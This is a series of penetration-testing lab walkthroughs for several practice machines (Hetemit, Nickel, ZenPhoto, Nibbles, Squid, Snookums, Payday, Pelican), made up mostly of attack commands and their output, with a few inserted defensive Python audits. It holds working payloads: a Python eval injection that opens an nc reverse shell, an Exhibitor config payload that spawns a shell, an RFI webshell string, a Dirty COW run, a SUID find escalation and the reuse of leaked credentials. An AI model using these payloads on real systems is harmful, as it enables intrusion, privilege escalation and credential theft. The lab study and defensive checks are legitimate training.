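_UNARY_OPS = {ast.USub: operator.neg, ast.UAdd: operator.pos}


def _eval_node(node):
    if isinstance(node, ast.Constant):
        # bool is a subclass of int, so exclude it explicitly
        if isinstance(node.value, (int, float)) and not isinstance(node.value, bool):
            return node.value
        raise ValueError("only numeric literals are allowed")
    if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
        return _BIN_OPS[type(node.op)](_eval_node(node.left), _eval_node(node.right))
    if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY_OPS:
        return _UNARY_OPS[type(node.op)](_eval_node(node.operand))
    raise ValueError(f"disallowed syntax: {type(node).__name__}")


def safe_verify(code: str, max_len: int = 64):
    """Evaluate a bounded arithmetic expression or raise ValueError."""
    if len(code) > max_len:
        raise ValueError("expression too long")
    try:
        tree = ast.parse(code, mode="eval")
    except SyntaxError as exc:
        raise ValueError("not a valid expression") from exc
    try:
        return _eval_node(tree.body)
    except ZeroDivisionError as exc:
        raise ValueError("division by zero") from exc


def rejects(code: str) -> bool:
    """True if safe_verify refuses the input (used to show what is blocked)."""
    try:
        safe_verify(code)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for sample in ("8*9", "8+9", "id", "__import__('os').system('id')"):
        print(repr(sample), "->", "rejected" if rejects(sample) else safe_verify(sample))
```

With this in place the two arithmetic probes from the curl tests still return 72 and 17, while `id` (a Name node) and the `__import__` payload (a Call node) are refused before evaluation. The length cap bounds recursion depth, and exponentiation is deliberately left out of the operator table so a short input cannot burn unbounded CPU.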
Initial Access – command injection
Since the output is always 0, use ping to confirm the command is actually executing.
┌──(kali㉿kali)-[~/oscp/pg/Hetemit]
└─$ curl -X POST -d "code=__import__('os').system('ping -c 4 192.168.45.228')" http://192.168.162.117:50000/verify
0
---
┌──(kali㉿kali)-[~/oscp/pg/Hetemit]
└─$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
03:27:15.567447 IP 192.168.162.117 > 192.168.45.228: ICMP echo request, id 2357, seq 1, length 64
03:27:15.567996 IP 192.168.45.228 > 192.168.162.117: ICMP echo reply, id 2357, seq 1, length 64
03:27:16.567896 IP 192.168.162.117 > 192.168.45.228: ICMP echo request, id 2357, seq 2, length 64
03:27:16.567912 IP 192.168.45.228 > 192.168.162.117: ICMP echo reply, id 2357, seq 2, length 64
03:27:17.568610 IP 192.168.162.117 > 192.168.45.228: ICMP echo request, id 2357, seq 3, length 64
03:27:17.568625 IP 192.168.45.228 > 192.168.162.117: ICMP echo reply, id 2357, seq 3, length 64
03:27:18.569436 IP 192.168.162.117 > 192.168.45.228: ICMP echo request, id 2357, seq 4, length 64
03:27:18.569452 IP 192.168.45.228 > 192.168.162.117: ICMP echo reply, id 2357, seq 4, length 64
Proof
┌──(kali㉿kali)-[~/oscp/pg/Hetemit]
└─$ rlwrap nc -lvnp 18000
listening on [any] 18000 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.117] 41052
python3 -c 'import pty;pty.spawn("/bin/bash")'
[cmeeks@hetemit restjson_hetemit]$ ls
ls
app.py __pycache__
[cmeeks@hetemit restjson_hetemit]$ cd ~
cd ~
[cmeeks@hetemit ~]$ ls
ls
local.txt register_hetemit restjson_hetemit share
[cmeeks@hetemit ~]$ cat local.txt
cat local.txt
bb223682a73fa4645b957710a15fb308
[cmeeks@hetemit ~]$
privilege escalation
sudo -l shows that /sbin/halt, /sbin/reboot and /sbin/poweroff can be run; see this post for the privilege escalation method. Editing a file is required, so a fully interactive shell is needed first.
nc -lvnp PORT (rlwrap cannot be used here)
ctrl+z
stty raw -echo;fg
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 18000
listening on [any] 18000 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.117] 41018
python3 -c 'import pty;pty.spawn("/bin/bash")'
[cmeeks@hetemit restjson_hetemit]$ cd ~
cd ~
[cmeeks@hetemit ~]$ sudo -l
sudo -l
Matching Defaults entries for cmeeks on hetemit:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User cmeeks may run the following commands on hetemit:
(root) NOPASSWD: /sbin/halt, /sbin/reboot, /sbin/poweroff
[cmeeks@hetemit ~]$ ^Z
zsh: suspended nc -lvnp 18000
┌──(kali㉿kali)-[~]
└─$ stty raw -echo;fg
[1] + continued nc -lvnp 18000
pwd
/home/cmeeks
[cmeeks@hetemit ~]$
Edit /etc/systemd/system/pythonapp.service and change the user that runs the port 50000 service to root.
[Unit]
Description=Python App
After=network-online.target
[Service]
Type=simple
WorkingDirectory=/home/cmeeks/restjson_hetemit
ExecStart=flask run -h 0.0.0.0 -p 50000
TimeoutSec=30
RestartSec=15s
User=root
ExecReload=/bin/kill -USR1 $MAINPID
Restart=on-failure
[Install]
WantedBy=multi-user.target
Then repeat the same technique.
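What made the reboot route work is a unit file the service user could edit plus a service that then ran as root. As an added example (not from the writeup), here is a small audit that parses a unit file and flags those settings: the unit above is the "before", and the hardened unit is a constructed assumption (user name, paths and sandboxing options are not from the target). The ownership check takes the st_uid/st_mode values os.stat() returns so it can be exercised offline.

```python
"""Audit a systemd unit for settings that turn an app compromise into root (added example)."""
import stat

# The unit from the writeup above, as the "before": the Flask app that eval()s
# request input is started as root.
WEAK_UNIT = """\
[Unit]
Description=Python App
After=network-online.target
[Service]
Type=simple
WorkingDirectory=/home/cmeeks/restjson_hetemit
ExecStart=flask run -h 0.0.0.0 -p 50000
TimeoutSec=30
RestartSec=15s
User=root
ExecReload=/bin/kill -USR1 $MAINPID
Restart=on-failure
[Install]
WantedBy=multi-user.target
"""

# Constructed "after" (assumed values, not from the target): an unprivileged
# account plus a few sandboxing options so a compromise of the app is contained.
HARDENED_UNIT = """\
[Unit]
Description=Python App
After=network-online.target
[Service]
Type=simple
User=pythonapp
Group=pythonapp
WorkingDirectory=/srv/pythonapp
ExecStart=/usr/bin/flask run -h 0.0.0.0 -p 50000
NoNewPrivileges=yes
ProtectSystem=strict
ProtectHome=yes
PrivateTmp=yes
Restart=on-failure
[Install]
WantedBy=multi-user.target
"""


def parse_unit(text):
    """Minimal INI-style parser: {section: {key: value}}, last value wins."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(('#', ';')):
            continue
        if line.startswith('[') and line.endswith(']'):
            current = line[1:-1]
            sections.setdefault(current, {})
            continue
        if current is None or '=' not in line:
            continue
        key, _, value = line.partition('=')
        sections[current][key.strip()] = value.strip()
    return sections


def audit_unit(text):
    """Return a list of findings for the [Service] section (empty means clean)."""
    svc = parse_unit(text).get('Service', {})
    findings = []
    # System services default to root when User= is absent.
    if svc.get('User', 'root') == 'root':
        findings.append('service runs as root')
    wd = svc.get('WorkingDirectory', '')
    if wd.startswith('/home/'):
        findings.append(f'WorkingDirectory {wd} is inside a user home directory')
    for opt in ('NoNewPrivileges', 'ProtectSystem', 'PrivateTmp'):
        if svc.get(opt, 'no').lower() in ('no', 'false', '0', 'off'):
            findings.append(f'{opt} is not enabled')
    return findings


def unit_file_tamperable(st_uid, st_mode):
    """True if a unit file is not root-owned or is group/world writable.

    Takes the st_uid/st_mode values from os.stat(); the escalation above
    relies on the service user being able to rewrite the unit.
    """
    return st_uid != 0 or bool(st_mode & (stat.S_IWGRP | stat.S_IWOTH))


if __name__ == "__main__":
    print("weak    :", audit_unit(WEAK_UNIT))
    print("hardened:", audit_unit(HARDENED_UNIT))
```

Run it against every file under /etc/systemd/system to get the same findings the writeup exploited: a unit that runs as root out of a user's home directory, with nothing stopping the process from gaining further privileges.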
Proof
┌──(kali㉿kali)-[~/oscp/pg/Hetemit]
└─$ curl -X POST -d "code=__import__('os').system('nc 192.168.45.228 80 -e /bin/bash')" http://192.168.162.117:50000/verify
---
┌──(kali㉿kali)-[~/oscp/pg/Hetemit]
└─$ rlwrap nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.117] 51908
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/proof.txt
e95d6f9049dffa91d565fb7b5abc1982
Nickel
Service Enumeration
Port Scan Results
Server IP Address | Ports Open |
192.168.162.99 | TCP:21,22,80,135,139,445,3389,5040,7680,8089,33333 |
Web enumeration
On the port 8089 site, clicking one of the buttons shows a request being sent to IP:33333.

Sending a plain GET returns:
┌──(kali㉿kali)-[~/oscp/pg/Nickel]
└─$ curl http://192.168.162.99:33333/list-running-procs
<p>Cannot "GET" /list-running-procs</p>
A plain POST requires Content-Length to be set, so finally the request is sent with a Content-Length header:
┌──(kali㉿kali)-[~/oscp/pg/Nickel]
└─$ curl -X POST http://192.168.162.99:33333/list-running-procs -H "Content-Length: 0"
name : System Idle Process
commandline :
name : System
commandline :
name : Registry
commandline :
name : smss.exe
commandline :
name : csrss.exe
commandline :
name : wininit.exe
commandline :
name : csrss.exe
commandline :
name : winlogon.exe
commandline : winlogon.exe
name : services.exe
commandline :
name : lsass.exe
commandline : C:\Windows\system32\lsass.exe
name : fontdrvhost.exe
commandline : "fontdrvhost.exe"
name : fontdrvhost.exe
commandline : "fontdrvhost.exe"
name : dwm.exe
commandline : "dwm.exe"
name : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws80.ps1
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
name : Memory Compression
commandline :
name : cmd.exe
commandline : cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p
"Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh
name : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws8089.ps1
name : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws33333.ps1
name : FileZilla Server.exe
commandline : "C:\Program Files (x86)\FileZilla Server\FileZilla Server.exe"
name : sshd.exe
commandline : "C:\Program Files\OpenSSH\OpenSSH-Win64\sshd.exe"
name : VGAuthService.exe
commandline : "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
name : vm3dservice.exe
commandline : C:\Windows\system32\vm3dservice.exe
name : vmtoolsd.exe
commandline : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
name : vm3dservice.exe
commandline : vm3dservice.exe -n
name : dllhost.exe
commandline : C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
name : WmiPrvSE.exe
commandline : C:\Windows\system32\wbem\wmiprvse.exe
name : msdtc.exe
commandline : C:\Windows\System32\msdtc.exe
name : LogonUI.exe
commandline : "LogonUI.exe" /flags:0x2 /state0:0xa3957055 /state1:0x41c64e6d
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
name : WmiPrvSE.exe
commandline : C:\Windows\system32\wbem\wmiprvse.exe
name : MicrosoftEdgeUpdate.exe
commandline : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /c
name : SgrmBroker.exe
commandline :
name : SearchIndexer.exe
commandline : C:\Windows\system32\SearchIndexer.exe /Embedding
name : CompatTelRunner.exe
commandline : C:\Windows\system32\compattelrunner.exe
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
name : CompatTelRunner.exe
commandline : C:\Windows\system32\compattelrunner.exe -maintenance
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
name : WmiApSrv.exe
commandline : C:\Windows\system32\wbem\WmiApSrv.exe
One of the command lines contains an SSH username and password.
Initial Access – use leaked info to log in over SSH
Base64-decoding the password gives NowiseSloopTheory139; log in over SSH with ariah/NowiseSloopTheory139.
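The leak above is worth catching before an attacker reads it. As an added example (not from the writeup), here is detection logic that parses a process listing in the same name/commandline layout, picks out password-style flags, and peels base64 off the value so the analyst sees what was actually passed. The listing and every credential in it are constructed; the flag list is a heuristic, since `-p` is also the port flag for many tools.

```python
"""Spot credentials passed on process command lines (added example)."""
import base64
import re

# Constructed process listing in the same "name :" / "commandline :" layout
# as the port 33333 output above; every value here is made up.
SAMPLE_LISTING = """\
name : svchost.exe
commandline : C:\\Windows\\system32\\svchost.exe -k netsvcs
name : cmd.exe
commandline : cmd.exe C:\\tools\\deploy.exe --deploy C:\\work\\dev.yaml --user devuser -p "UzNjcmV0UGFzcw==" --server build01 --protocol ssh
name : sqlcmd.exe
commandline : sqlcmd.exe -S db01 -U sa -P Summer2024!
name : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\\scripts\\ws80.ps1
"""

# Flags that commonly carry a secret, followed by an optionally quoted value.
# Longer alternatives come first so "-pw" is not matched as "-p" + "w".
PASSWORD_FLAGS = re.compile(
    r'(?:^|\s)(--password|-password|-pw|-p|-P|/p)[\s=:]+("?)([^\s"]+)\2'
)
B64_TOKEN = re.compile(r'^[A-Za-z0-9+/]{8,}={0,2}$')


def parse_listing(text):
    """Pair each 'name :' line with the 'commandline :' line after it."""
    procs, name = [], None
    for line in text.splitlines():
        key, _, value = line.partition(':')
        key, value = key.strip(), value.strip()
        if key == 'name':
            name = value
        elif key == 'commandline' and name is not None:
            procs.append((name, value))
            name = None
    return procs


def peel_base64(token, max_layers=3):
    """Decode nested base64 layers while the result stays printable text.

    Returns the innermost decoded text, or None if the token was not base64.
    """
    current = token
    for _ in range(max_layers):
        if not B64_TOKEN.match(current):
            break
        try:
            text = base64.b64decode(current, validate=True).decode('ascii')
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            break
        text = text.strip()
        if not text or not text.isprintable():
            break
        current = text
    return None if current == token else current


def find_cmdline_secrets(text):
    """Return one finding per password-style flag seen in any command line."""
    findings = []
    for name, cmdline in parse_listing(text):
        for m in PASSWORD_FLAGS.finditer(cmdline):
            flag, value = m.group(1), m.group(3)
            findings.append({
                'process': name,
                'flag': flag,
                'value': value,
                'decoded': peel_base64(value),
            })
    return findings


if __name__ == "__main__":
    for f in find_cmdline_secrets(SAMPLE_LISTING):
        print(f"{f['process']}: {f['flag']} {f['value']!r} -> {f['decoded']!r}")
```

The fix on the host side is to stop passing secrets as arguments at all (an environment file or credential store readable only by the service account), because command lines are visible to every local user and, as here, to anything that exposes a process list over the network.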
Proof
┌──(kali㉿kali)-[~/oscp/pg/Nickel]
└─$ ssh ariah@192.168.162.99
The authenticity of host '192.168.162.99 (192.168.162.99)' can't be established.
ED25519 key fingerprint is SHA256:e25NU8Sljo45nzplpVGugSC5xB5vToeqoHPYJkQqbPU.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:57: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.162.99' (ED25519) to the list of known hosts.
ariah@192.168.162.99's password:
Microsoft Windows [Version 10.0.18362.1016]
(c) 2019 Microsoft Corporation. All rights reserved.
ariah@NICKEL C:\Users\ariah>type desktop\local.txt
5f286730b01157a6b18934327ce63538
ariah@NICKEL C:\Users\ariah>
privilege escalation
In C:\ftp there is a file Infrastructure.pdf, which is password protected. Using pdf2john and cracking the hash gives the password ariah4168. Reading the document reveals an endpoint that takes a command.

Add the user we already have (ariah) to the administrators group.
┌──(kali㉿kali)-[~/oscp/pg/Nickel]
└─$ curl "http://192.168.162.99/?net%20localgroup%20administrators%20ariah%20/add"
<!doctype html><html><body>dev-api started at 2024-08-03T05:08:16
<pre>The command completed successfully.
</pre>
</body></html>
RDP in and grab proof.txt.
Proof

ZenPhoto
Service Enumeration
Port Scan Results
Server IP Address | Ports Open |
192.168.162.41 | TCP:22,23,80,3306 |
Web enumeration
Directory brute-forcing finds /test, which runs zenphoto and has an RCE vulnerability.
Initial Access
┌──(kali㉿kali)-[~/oscp/pg/ZenPhoto]
└─$ php 18083 192.168.162.41 /test/
+-----------------------------------------------------------+
| Zenphoto <= 1.4.1.4 Remote Code Execution Exploit by EgiX |
+-----------------------------------------------------------+
zenphoto-shell# id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
zenphoto-shell# ls /home
local.txt
zenphoto-shell# cat /home/local.txt
72a5777ab52bd15079a3e3e02436c1e2
zenphoto-shell#
privilege escalation
linpeas shows the host is vulnerable to dirtycow; use dirty.c.
Proof
www-data@offsecsrv:/tmp$ wget 192.168.45.228:8000/dirty.c
wget 192.168.45.228:8000/dirty.c
--2025-06-11 10:19:52-- http://192.168.45.228:8000/dirty.c
Connecting to 192.168.45.228:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4815 (4.7K) [text/x-csrc]
Saving to: `dirty.c'
100%[======================================>] 4,815 --.-K/s in 0s
2025-06-11 10:19:53 (21.1 MB/s) - `dirty.c' saved [4815/4815]
www-data@offsecsrv:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt
gcc -pthread dirty.c -o dirty -lcrypt
www-data@offsecsrv:/tmp$ ./dirty
./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: pwn
Complete line:
firefart:fiY9IH9EEmntk:0:0:pwned:/root:/bin/bash
mmap: b77a2000
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'pwn'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
www-data@offsecsrv:/tmp$
www-data@offsecsrv:/tmp$ madvise 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'pwn'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
www-data@offsecsrv:/tmp$ su firefart
su firefart
Password: pwn
firefart@offsecsrv:/tmp# cat /root/proof.txt
cat /root/proof.txt
9a1b4905fb1301bf61cd99d581ead841
firefart@offsecsrv:/tmp#
Nibbles
Service Enumeration
Port Scan Results
Server IP Address | Ports Open |
192.168.162.47 | TCP:21,22,80,5437 |
postgres enumeration
Login succeeds with the weak password postgres/postgres; the running version has an RCE vulnerability.
Initial Access
Use the exploit:
┌──(kali㉿kali)-[~/oscp/pg/Nibbles]
└─$ python3 50847 -i 192.168.162.47 -p 5437 -U postgres -P postgres -c id
[+] Connecting to PostgreSQL Database on 192.168.162.47:5437
[+] Connection to Database established
[+] Checking PostgreSQL version
[+] PostgreSQL 11.7 is likely vulnerable
[+] Creating table _c5022142c68aa9060a84a6dff8fb4534
[+] Command executed
uid=106(postgres) gid=113(postgres) groups=113(postgres),112(ssl-cert)
[+] Deleting table _c5022142c68aa9060a84a6dff8fb4534
Proof
┌──(kali㉿kali)-[~/oscp/pg/Nibbles]
└─$ rlwrap nc -lvnp 21
listening on [any] 21 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.47] 39278
bash: cannot set terminal process group (1359): Inappropriate ioctl for device
bash: no job control in this shell
postgres@nibbles:/var/lib/postgresql$ cd /home
cd /home
postgres@nibbles:/home$ ls
ls
wilson
postgres@nibbles:/home$ cd wilson
cd wilson
postgres@nibbles:/home/wilson$ ls
ls
ftp
local.txt
postgres@nibbles:/home/wilson$ cat local.txt
cat local.txt
a242cd4b5e026c7750a45e830222c37d
postgres@nibbles:/home/wilson$
privilege escalation – SUID
find has the SUID bit set; use find to escalate privileges.
postgres@nibbles:/home/wilson$ find . -exec /bin/bash -p \; -quit
find . -exec /bin/bash -p \; -quit
id
uid=106(postgres) gid=113(postgres) euid=0(root) groups=113(postgres),112(ssl-cert)
cat /root/proof.txt
3c619a1a2408c1c09c953b52167d954e
Squid
Service Enumeration
Port Scan Results
Server IP Address | Ports Open |
192.168.162.189 | TCP:135,139,445,3128 |
Port 3128 runs the Squid HTTP proxy; using https://github.com/aancw/spose reveals that ports 8080 and 3306 are open.
┌──(kali㉿kali)-[~/oscp/pg/Squid/spose]
└─$ python3 spose.py --proxy 192.168.162.189:3128 --target 192.168.162.189
Scanning default common ports
Using proxy address 192.168.162.189:3128
192.168.162.189:3306 seems OPEN
192.168.162.189:8080 seems OPEN
After configuring the proxy in Firefox, the site on port 8080 can be reached.


Initial Access – run sql shell to RCE
Visit /phpmyadmin; logging in as root with an empty password succeeds. Then use SQL to write a webshell to a file.

Proof
┌──(kali㉿kali)-[~/oscp/pg/Squid]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.189] 49719
whoami
nt authority\system
PS C:\wamp\www> type c:\users\administrator\desktop\proof.txt
feacfd5a024980898930072a23b3e23a
PS C:\wamp\www>
Snookums
Service Enumeration
Port Scan Results
Server IP Address | Ports Open |
192.168.228.58 | TCP:21,22,80,110,139,445,3306 |
Web Enumeration
The site shows Simple PHP Photo Gallery v0.8; a quick search shows it has an RFI.
Initial Access – RFI to RCE
RFI payload:
data://text/plain,<?php system($_GET['cmd']);?>&cmd=id
After getting the reverse shell, there is a db.php file containing the MySQL root password; the DB has a users table with usernames and passwords.
bash-4.2$ cat db.php
cat db.php
<?php
define('DBHOST', '127.0.0.1');
define('DBUSER', 'root');
define('DBPASS', 'MalapropDoffUtilize1337');
define('DBNAME', 'SimplePHPGal');
?>
bash-4.2$ mysql -uroot -pMalapropDoffUtilize1337 -h localhost
mysql -uroot -pMalapropDoffUtilize1337 -h localhost
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 10
Server version: 8.0.20 MySQL Community Server - GPL
Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| SimplePHPGal |
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0.01 sec)
mysql> use SimplePHPGal;
use SimplePHPGal;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+------------------------+
| Tables_in_SimplePHPGal |
+------------------------+
| users |
+------------------------+
1 row in set (0.00 sec)
mysql> select * from users;
select * from users;
+----------+----------------------------------------------+
| username | password |
+----------+----------------------------------------------+
| josh | VFc5aWFXeHBlbVZJYVhOelUyVmxaSFJwYldVM05EYz0= |
| michael | U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ== |
| serena | VDNabGNtRnNiRU55WlhOMFRHVmhiakF3TUE9PQ== |
+----------+----------------------------------------------+
3 rows in set (0.00 sec)
mysql> exit
exit
Bye
bash-4.2$
After decoding twice, we get michael's password.
Proof
bash-4.2$ su michael
su michael
Password: HockSydneyCertify123
[michael@snookums html]$ sudo su
sudo su
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for michael: HockSydneyCertify123
michael is not in the sudoers file. This incident will be reported.
[michael@snookums html]$ cd ~
cd ~
[michael@snookums ~]$ ls
ls
local.txt
[michael@snookums ~]$ cat local.txt
cat local.txt
661ee72bc8c6e0170dfd2da58e3be5ab
[michael@snookums ~]$
Privilege Escalation – modify /etc/passwd
linpeas shows /etc/passwd is writable; log in over SSH with the credentials just obtained and modify /etc/passwd.
Proof
[michael@snookums ~]$ openssl passwd pwn
ZOPukRruoWuxg
[michael@snookums ~]$ vi /etc/passwd
[michael@snookums ~]$ su root
Password:
[root@snookums michael]# cat /root/proof.txt
fdf25ed925ac23431cfd978f8fdc9e4a
[root@snookums michael]#
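Both the dirty.c run on ZenPhoto (which appends a uid 0 user with an inline hash) and the writable /etc/passwd on Snookums leave the same traces behind. As an added example (not from the writeup), here is an audit that parses /etc/passwd and reports extra uid 0 accounts, inline password hashes that bypass /etc/shadow, empty passwords and malformed lines, plus an ownership/mode check that takes os.stat() values so it can be tested offline. The sample file and its hash value are constructed.

```python
"""Audit /etc/passwd for the changes the two escalations above leave behind (added example)."""
import stat

# Constructed /etc/passwd sample. The 'firefart' line has the shape dirty.c
# reports above (a crypt hash inline and uid/gid 0); the hash value is made up.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
michael:x:1000:1000::/home/michael:/bin/bash
firefart:AbCdEfGhIjKlM:0:0:pwned:/root:/bin/bash
"""

# Field 2 values that mean "look in /etc/shadow" or "locked" rather than a hash.
SHADOW_MARKERS = ('x', '*', '!', '!!')


def parse_passwd(text):
    """Return (entries, malformed) where entries are dicts per well-formed line."""
    entries, malformed = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith('#'):
            continue
        fields = line.split(':')
        if len(fields) != 7 or not fields[2].isdigit() or not fields[3].isdigit():
            malformed.append((lineno, line))
            continue
        name, pw, uid, gid, _gecos, home, shell = fields
        entries.append({
            'line': lineno, 'name': name, 'pw': pw,
            'uid': int(uid), 'gid': int(gid), 'home': home, 'shell': shell,
        })
    return entries, malformed


def audit_passwd(text, expected_uid0=('root',)):
    """Findings that point at a tampered passwd file."""
    entries, malformed = parse_passwd(text)
    return {
        # Any uid 0 account besides the expected one(s) is a second root.
        'extra_uid0': [e['name'] for e in entries
                       if e['uid'] == 0 and e['name'] not in expected_uid0],
        # A hash stored here is used for login even when /etc/shadow exists.
        'inline_hashes': [e['name'] for e in entries
                          if e['pw'] and e['pw'] not in SHADOW_MARKERS],
        'empty_passwords': [e['name'] for e in entries if e['pw'] == ''],
        'malformed': malformed,
    }


def passwd_file_tamperable(st_uid, st_mode):
    """True if the file is not root-owned or is group/world writable (os.stat values)."""
    return st_uid != 0 or bool(st_mode & (stat.S_IWGRP | stat.S_IWOTH))


if __name__ == "__main__":
    import os
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else None
    text = open(path).read() if path else SAMPLE_PASSWD
    print(audit_passwd(text))
    if path:
        st = os.stat(path)
        print("tamperable:", passwd_file_tamperable(st.st_uid, st.st_mode))
```

Pass a path to audit a real file (`python3 audit_passwd.py /etc/passwd`); without one it runs on the constructed sample. A file integrity monitor or a periodic run of this check catches both the appended uid 0 user and the hash that replaces an `x`, which are exactly the two edits shown above.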
Payday
Service Enumeration
Port Scan Results
Server IP Address | Ports Open |
192.168.162.39 | TCP:22,80,110,139,143,445,993,995 |
Web Enumeration
The site runs CS-Cart; a quick search shows it can be exploited for RCE: https://gist.github.com/momenbasel/ccb91523f86714edb96c871d4cf1d05c
Initial Access – file upload to rce
Log in to /admin.php with the weak password admin/admin, find the Template editor and upload a phtml file; visiting /skins then shows the reverse shell just uploaded.
┌──(kali㉿kali)-[~/oscp/pg/Payday]
└─$ rlwrap nc -lvnp 110
listening on [any] 110 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.39] 41293
bash: no job control in this shell
www-data@payday:/var/www/skins$ ls /home
patrick
www-data@payday:/var/www/skins$ cd /home/patrick && cat local.txt
d60a1e66c281ae45e8bad22513caf202
www-data@payday:/home/patrick$
Privilege Escalation
The weak password patrick/patrick switches us to patrick.
patrick@payday:~$ sudo -l
sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for patrick:patrick
User patrick may run the following commands on this host:
(ALL) ALL
patrick@payday:~$ sudo su
sudo su
root@payday:/home/patrick# cat /root/proof.txt
cat /root/proof.txt
4b853a3f3c3732e0d748f5718c0ddbb3
root@payday:/home/patrick#
Pelican
Service Enumeration
Port Scan Results
Server IP Address | Ports Open |
192.168.188.98 | TCP:22,139,445,631,2181,2222,8080,8081,39605 |
Web Enumeration
Opening the site on port 8081 redirects to http://IP:8080/exhibitor/v1/ui/index.html, which shows Exhibitor for ZooKeeper running; it has an RCE vulnerability.
Initial Access – Web RCE
Reference: https://github.com/thehunt1s0n/Exihibitor-RCE/blob/main/exploit.sh
┌──(kali㉿kali)-[~/oscp/pg/Pelican]
└─$ cat payload
curl -s -X POST -d '{"zookeeperInstallDirectory":"/opt/zookeeper","zookeeperDataDirectory":"/zookeeper/data","zookeeperLogDirectory":"","logIndexDirectory":"","autoManageInstancesSettlingPeriodMs":"10000","autoManageInstancesFixedEnsembleSize":"0","autoManageInstancesApplyAllAtOnce":"1","observerThreshold":"3","serversSpec":"1:pelican","javaEnvironment":"$(/bin/nc -e /bin/sh '192.168.45.186' '4444' &)","log4jProperties":"","clientPort":"2181","connectPort":"2888","electionPort":"3888","checkMs":"2000","cleanupPeriodMs":"200000","cleanupMaxFiles":"10","backupPeriodMs":"60000","backupMaxStoreMs":"86400000","autoManageInstances":"1","zooCfgExtra":{"syncLimit":"5","tickTime":"2000","initLimit":"10"},"backupExtra":{},"serverId":1}' http://192.168.188.98:8080/exhibitor/v1/config/set
┌──(kali㉿kali)-[~/oscp/pg/Pelican]
└─$ bash payload
{"message":"OK","succeeded":true}
Proof
┌──(kali㉿kali)-[~/oscp/pg/Pelican]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.186] from (UNKNOWN) [192.168.188.98] 41012
python3 -c 'import pty;pty.spawn("/bin/bash")'
